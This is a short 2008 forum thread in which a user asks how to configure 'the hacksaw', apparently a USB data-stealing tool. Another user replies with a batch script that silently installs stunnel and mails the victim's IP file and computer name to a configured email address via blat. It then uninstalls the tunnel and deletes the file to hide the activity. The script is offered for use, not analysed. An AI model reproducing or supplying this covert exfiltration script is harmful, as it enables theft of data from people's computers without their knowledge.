sc0rpi0 Posted January 10, 2008 Share Posted January 10, 2008 Yes, this is a noob question. What configurations do I have to make to the hacksaw to make it work? Quote Link to comment Share on other sites More sharing options...
Supervisor Posted January 10, 2008 Share Posted January 10, 2008 Don`t forget to change the setting. @echo off :start :: Configure Email Options SET emailfrom= YOUR EMAIL SET emailto=YOUR EMAIL SET password=YOUR EMAIL PASSWORD SET subject= %computername%_log call getip.cmd stunnel-4.11.exe -install -quiet net start stunnel GOTO sendfiles :sendfiles for %%i in (ip.txt) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -subject %subject% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup :cleanup :: Stop stunnel rem taskkill /f /im stunnel-4.11.exe (??) net stop stunnel stunnel-4.11.exe -uninstall -quiet :: Delete documents del ip.txt ping -n 3 localhost > NUL GOTO end :end Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.